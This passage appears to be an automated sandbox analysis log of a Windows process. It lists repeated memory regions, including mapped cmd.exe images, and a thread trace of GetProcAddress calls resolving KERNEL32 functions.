"pagefile_0x0000000001980000" filename = "" Region: id = 28510 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28511 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28512 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28840 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28841 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28842 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28843 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28844 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28845 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28846 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28847 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28848 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 28849 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28850 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28851 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30274 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30275 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30276 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30277 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30278 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30279 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30280 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30281 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30282 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30283 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30284 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30285 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30504 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30505 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30506 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30507 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30508 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30509 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30510 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30511 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30512 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30513 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30514 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30515 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30719 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30720 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30721 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30722 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30723 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30724 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30725 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30726 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30727 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30728 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 30729 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30730 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30967 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 30968 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30969 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30970 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30971 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30972 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30973 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30974 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30975 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30976 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 30977 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 30978 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31172 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 31173 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31174 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31175 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31176 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31177 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31178 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31179 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31180 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31181 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31182 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31183 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31377 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 31378 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31379 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31380 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31381 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31382 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31383 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31384 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31385 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31386 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31387 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31388 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31718 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 31719 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31720 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31721 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31722 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31723 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31724 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31725 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31726 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31727 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 31728 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 31729 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32380 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 32381 start_va = 0x4aa80000 end_va = 0x4aa8ffff entry_point = 0x4aa80000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32382 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32383 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32384 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32385 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32386 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32387 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32388 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32389 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32390 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 32391 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32706 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 32707 start_va = 0x4a3d0000 end_va = 0x4a3dffff entry_point = 0x4a3d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32708 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32709 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32710 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32711 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32712 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32713 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32714 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32715 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32716 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 32717 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33547 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 33548 start_va = 0x4aaf0000 end_va = 0x4aafffff entry_point = 0x4aaf0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33549 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33550 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33551 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33552 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33553 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33554 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33555 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33556 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33557 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33558 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34054 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34055 start_va = 0x4ab60000 end_va = 0x4ab6ffff entry_point = 0x4ab60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34092 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34093 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34094 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34095 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34096 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34097 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34098 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34099 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34100 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34101 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 34333 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34334 start_va = 0x4a3f0000 end_va = 0x4a3fffff entry_point = 0x4a3f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34335 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34336 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34337 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34338 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34339 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34340 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34341 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34342 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34343 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34344 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 34946 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34947 start_va = 0x4a280000 end_va = 0x4a28ffff entry_point = 0x4a280000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34948 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34949 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34950 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34951 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34952 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34953 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34954 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34955 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34956 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34957 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Thread: id = 9 os_tid = 0xaf0 [0093.915] 
LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.917] 
GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.917] 